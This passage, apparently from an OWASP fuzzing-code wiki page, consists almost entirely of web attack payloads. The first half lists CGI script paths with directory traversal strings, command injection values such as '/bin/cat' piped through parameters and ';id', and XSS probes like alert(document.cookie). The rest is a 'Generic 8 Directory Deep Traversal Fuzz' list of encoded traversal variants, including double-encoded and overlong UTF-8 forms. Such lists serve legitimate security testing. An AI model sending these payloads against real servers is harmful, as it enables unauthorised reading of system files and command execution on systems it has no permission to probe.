journal.cgi?folder=journal.cgi%00&lt;br /&gt;
ksh&lt;br /&gt;
lastlines.cgi?process&lt;br /&gt;
listrec.pl&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
log-reader.cgi&lt;br /&gt;
log/&lt;br /&gt;
log/nether-log.pl?checkit&lt;br /&gt;
login.cgi&lt;br /&gt;
login.pl&lt;br /&gt;
login.pl?course_id=\&lt;br /&gt;
logit.cgi&lt;br /&gt;
logs.pl&lt;br /&gt;
logs/&lt;br /&gt;
logs/access_log&lt;br /&gt;
logs/error_log&lt;br /&gt;
lookwho.cgi&lt;br /&gt;
ls&lt;br /&gt;
lwgate&lt;br /&gt;
lwgate.cgi&lt;br /&gt;
magiccard.cgi?pa=3Dpreview&amp;amp;amp;next=3Dcustom&amp;amp;amp;page=3D../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mail&lt;br /&gt;
mail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mail/nph-mr.cgi?do=loginhelp&amp;amp;configLanguage=../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mailit.pl&lt;br /&gt;
maillist.cgi&lt;br /&gt;
maillist.pl&lt;br /&gt;
mailnews.cgi&lt;br /&gt;
main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
majordomo.pl&lt;br /&gt;
man2html&lt;br /&gt;
mastergate/search.cgi?search=0&amp;amp;search_on=all&lt;br /&gt;
meta.pl&lt;br /&gt;
mgrqcgi&lt;br /&gt;
mini_logger.cgi&lt;br /&gt;
mmstdod.cgi&lt;br /&gt;
moin.cgi?test&lt;br /&gt;
mojo/mojo.cgi&lt;br /&gt;
mrtg.cfg?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=blah&lt;br /&gt;
ms_proxy_auth_query/&lt;br /&gt;
mt-static/&lt;br /&gt;
mt-static/mt-check.cgi&lt;br /&gt;
mt-static/mt-load.cgi&lt;br /&gt;
mt-static/mt.cfg&lt;br /&gt;
mt/&lt;br /&gt;
mt/mt-check.cgi&lt;br /&gt;
mt/mt-load.cgi&lt;br /&gt;
mt/mt.cfg&lt;br /&gt;
multihtml.pl?multi={KNOWNFILE}%00html&lt;br /&gt;
musicqueue.cgi&lt;br /&gt;
myguestbook.cgi?action=view&lt;br /&gt;
namazu.cgi&lt;br /&gt;
nbmember.cgi?cmd=list_all_users&lt;br /&gt;
netauth.cgi?cmd=show&amp;amp;page=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
netpad.cgi&lt;br /&gt;
newsdesk.cgi?t=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
nimages.php&lt;br /&gt;
nlog-smb.cgi&lt;br /&gt;
nlog-smb.pl&lt;br /&gt;
non-existent.pl&lt;br /&gt;
noshell&lt;br /&gt;
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
nph-error.pl&lt;br /&gt;
nph-exploitscanget.cgi&lt;br /&gt;
nph-maillist.pl&lt;br /&gt;
nph-publish&lt;br /&gt;
nph-publish.cgi&lt;br /&gt;
nph-showlogs.pl?files=../../&amp;amp;filter=.*&amp;amp;submit=Go&amp;amp;linecnt=500&amp;amp;refresh=0&lt;br /&gt;
nph-test-cgi&lt;br /&gt;
ntitar.pl&lt;br /&gt;
opendir.php?{KNOWNFILE}&lt;br /&gt;
orders/orders.txt&lt;br /&gt;
pagelog.cgi&lt;br /&gt;
pals-cgi?palsAction=restart&amp;amp;documentName={KNOWNFILE}&lt;br /&gt;
parse-file&lt;br /&gt;
pass&lt;br /&gt;
passwd&lt;br /&gt;
passwd.txt&lt;br /&gt;
password&lt;br /&gt;
pbcgi.cgi?name=Joe%Camel&amp;amp;email=%3C&lt;br /&gt;
perl&lt;br /&gt;
perl?-v&lt;br /&gt;
perlshop.cgi&lt;br /&gt;
pfdispaly.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
pfdispaly.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
pfdisplay.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
phf&lt;br /&gt;
phf.cgi?QALIA&lt;br /&gt;
phf?Qname=root%0Acat%20{KNOWNFILE}%20&lt;br /&gt;
photo/&lt;br /&gt;
photo/manage.cgi&lt;br /&gt;
photo/protected/manage.cgi&lt;br /&gt;
php-cgi&lt;br /&gt;
php.cgi?{KNOWNFILE}&lt;br /&gt;
plusmail&lt;br /&gt;
pollit/Poll_It_&lt;br /&gt;
pollssi.cgi&lt;br /&gt;
post-query&lt;br /&gt;
post_query&lt;br /&gt;
postcards.cgi&lt;br /&gt;
powerup/r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
printenv&lt;br /&gt;
printenv.tmp&lt;br /&gt;
probecontrol.cgi?command=enable&amp;amp;username=cancer&amp;amp;password=killer&lt;br /&gt;
processit.pl&lt;br /&gt;
profile.cgi&lt;br /&gt;
pu3.pl&lt;br /&gt;
publisher/search.cgi?dir=jobs&amp;amp;template=;cat%20{KNOWNFILE}|&amp;amp;output_number=10&lt;br /&gt;
query&lt;br /&gt;
query?mss=%2e%2e/config&lt;br /&gt;
quickstore.cgi?page=../../../../../../../../../..{KNOWNFILE}%00html&amp;amp;cart_id=&lt;br /&gt;
quikstore.cfg&lt;br /&gt;
quizme.cgi&lt;br /&gt;
r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ratlog.cgi&lt;br /&gt;
redirect&lt;br /&gt;
register.cgi&lt;br /&gt;
replicator/webpage.cgi/&lt;br /&gt;
responder.cgi&lt;br /&gt;
retrieve_password.pl&lt;br /&gt;
rksh&lt;br /&gt;
rmp_query&lt;br /&gt;
robadmin.cgi&lt;br /&gt;
robpoll.cgi&lt;br /&gt;
rpm_query&lt;br /&gt;
rsh&lt;br /&gt;
rtm.log&lt;br /&gt;
rwcgi60&lt;br /&gt;
rwcgi60/showenv&lt;br /&gt;
rwwwshell.pl&lt;br /&gt;
sawmill5?rfcf+%22{KNOWNFILE}%22+spbn+1,1,21,1,1,1,1&lt;br /&gt;
sawmill?rfcf+%22&lt;br /&gt;
sbcgi/sitebuilder.cgi&lt;br /&gt;
scoadminreg.cgi&lt;br /&gt;
scripts/*%0a.pl&lt;br /&gt;
search.cgi&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
search.php?searchstring=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl&lt;br /&gt;
search.pl?Realm=All&amp;amp;Match=0&amp;amp;Terms=test&amp;amp;nocpp=1&amp;amp;maxhits=10&amp;amp;;Rank=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl?form=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
search/search.cgi?keys=*&amp;amp;prc=any&amp;amp;catigory=../../../../../../../../../../../../etc&lt;br /&gt;
sendform.cgi&lt;br /&gt;
sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message&lt;br /&gt;
sendtemp.pl?templ=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
session/adminlogin&lt;br /&gt;
sewse?/home/httpd/html/sewse/jabber/comment2.jse+{KNOWNFILE}&lt;br /&gt;
sh&lt;br /&gt;
shop.cgi?page=../../../../../../..{KNOWNFILE}&lt;br /&gt;
shop.pl/page=;cat%20shop.pl|&lt;br /&gt;
shop/auth_data/auth_user_file.txt&lt;br /&gt;
shop/orders/orders.txt&lt;br /&gt;
shopper.cgi?newpage=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
shopplus.cgi?dn=domainname.com&amp;amp;cartid=%CARTID%&amp;amp;file=;cat%20{KNOWNFILE}|&lt;br /&gt;
show.pl&lt;br /&gt;
showcheckins.cgi?person=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
showuser.cgi&lt;br /&gt;
simple/view_page?mv_arg=|cat%20{KNOWNFILE}|&lt;br /&gt;
simplestguest.cgi&lt;br /&gt;
simplestmail.cgi&lt;br /&gt;
smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
smartsearch/smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
sojourn.cgi?cat=../../../../../../../../../../etc/password%00&lt;br /&gt;
spin_client.cgi?aaaaaaaa&lt;br /&gt;
ss&lt;br /&gt;
sscd_suncourier.pl&lt;br /&gt;
ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{KNOWNFILE}&lt;br /&gt;
start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
stat.pl&lt;br /&gt;
stat/&lt;br /&gt;
stats-bin-p/reports/index.html&lt;br /&gt;
stats.pl&lt;br /&gt;
stats.prf&lt;br /&gt;
stats/&lt;br /&gt;
stats/statsbrowse.asp?filepath=c:\&amp;amp;Opt=3&lt;br /&gt;
stats_old/&lt;br /&gt;
statsconfig&lt;br /&gt;
statusconfig.pl&lt;br /&gt;
statview.pl&lt;br /&gt;
store.cgi?&lt;br /&gt;
store/agora.cgi?cart_id=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
store/agora.cgi?page=whatever33.html&lt;br /&gt;
store/index.cgi?page=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
story/story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
survey&lt;br /&gt;
survey.cgi&lt;br /&gt;
sws/admin.html&lt;br /&gt;
sws/manager.pl&lt;br /&gt;
tablebuild.pl&lt;br /&gt;
talkback.cgi?article=../../../../../../../..{KNOWNFILE}%00&amp;amp;action=view&amp;amp;matchview=1&lt;br /&gt;
tcsh&lt;br /&gt;
technote/main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=/../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
test-cgi.tcl&lt;br /&gt;
test-cgi?/*&lt;br /&gt;
test-env&lt;br /&gt;
test.cgi&lt;br /&gt;
test/test.cgi&lt;br /&gt;
texis/junk&lt;br /&gt;
texis/phine&lt;br /&gt;
textcounter.pl&lt;br /&gt;
tidfinder.cgi&lt;br /&gt;
tigvote.cgi&lt;br /&gt;
title.cgi&lt;br /&gt;
tpgnrock&lt;br /&gt;
traffic.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
troops.cgi&lt;br /&gt;
ttawebtop.cgi/?action=start&amp;amp;pg=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ultraboard.cgi&lt;br /&gt;
ultraboard.pl&lt;br /&gt;
unlg1.1&lt;br /&gt;
unlg1.2&lt;br /&gt;
update.dpgs&lt;br /&gt;
upload.cgi&lt;br /&gt;
uptime&lt;br /&gt;
urlcount.cgi?%3CIMG%20&lt;br /&gt;
ustorekeeper.pl?command=goto&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
utm/admin&lt;br /&gt;
utm/utm_stat&lt;br /&gt;
view-source&lt;br /&gt;
view-source?view-source&lt;br /&gt;
view_item?HTML_FILE=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
viewcvs.cgi/viewcvs/?cvsroot=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\&lt;br /&gt;
viewlogs.pl&lt;br /&gt;
viewsource?{KNOWNFILE}&lt;br /&gt;
viralator.cgi&lt;br /&gt;
virgil.cgi&lt;br /&gt;
vote.cgi&lt;br /&gt;
vpasswd.cgi&lt;br /&gt;
vq/demos/respond.pl?&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
w3-msql&lt;br /&gt;
w3-sql&lt;br /&gt;
wais.pl&lt;br /&gt;
way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
way-board/way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
webais&lt;br /&gt;
webbbs.cgi&lt;br /&gt;
webbbs/webbbs_config.pl?name=joe&amp;amp;email=test@example.com&amp;amp;body=aaaaffff&amp;amp;followup=10;cat%20{KNOWNFILE}&lt;br /&gt;
webcart/webcart.cgi?CONFIG=mountain&amp;amp;CHANGE=YE&lt;br /&gt;
webdist.cgi?distloc=;cat%20{KNOWNFILE}&lt;br /&gt;
webdriver&lt;br /&gt;
webgais&lt;br /&gt;
webif.cgi&lt;br /&gt;
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
webmap.cgi&lt;br /&gt;
webnews.pl&lt;br /&gt;
webplus?about&lt;br /&gt;
webplus?script=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
websendmail&lt;br /&gt;
webspirs.cgi?sp.nextform=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
webutil.pl&lt;br /&gt;
webutils.pl&lt;br /&gt;
webwho.pl&lt;br /&gt;
where.pl?sd=ls%20/etc&lt;br /&gt;
whois.cgi?action=load&amp;amp;whois=%3Bid&lt;br /&gt;
whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois/whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois_raw.cgi?fqdn=%0Acat%20{KNOWNFILE}&lt;br /&gt;
windmail&lt;br /&gt;
wrap&lt;br /&gt;
wrap.cgi&lt;br /&gt;
ws_ftp.ini&lt;br /&gt;
www-sql&lt;br /&gt;
wwwadmin.pl&lt;br /&gt;
wwwboard.cgi.cgi&lt;br /&gt;
wwwboard.pl&lt;br /&gt;
wwwstats.pl&lt;br /&gt;
wwwthreads/3tvars.pm&lt;br /&gt;
wwwthreads/w3tvars.pm&lt;br /&gt;
wwwwais&lt;br /&gt;
zml.cgi?file=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
zsh&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Generic 8 Directory Deep Traversal Fuzz (17 March 2010) &lt;br /&gt;
# Derived from the awesome &amp;quot;Directory Traversal Fuzzing Code&amp;quot; v0.2 by Luca Carettoni&lt;br /&gt;
# Did some cleanup &amp;amp; removed anything to the right of {FILE} for inclusion in a&lt;br /&gt;
# separate fuzzfile for more flexibiity, for the OWASP Fuzzing Code Database. &lt;br /&gt;
# adam.muntner@uietmove.com &lt;br /&gt;
&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
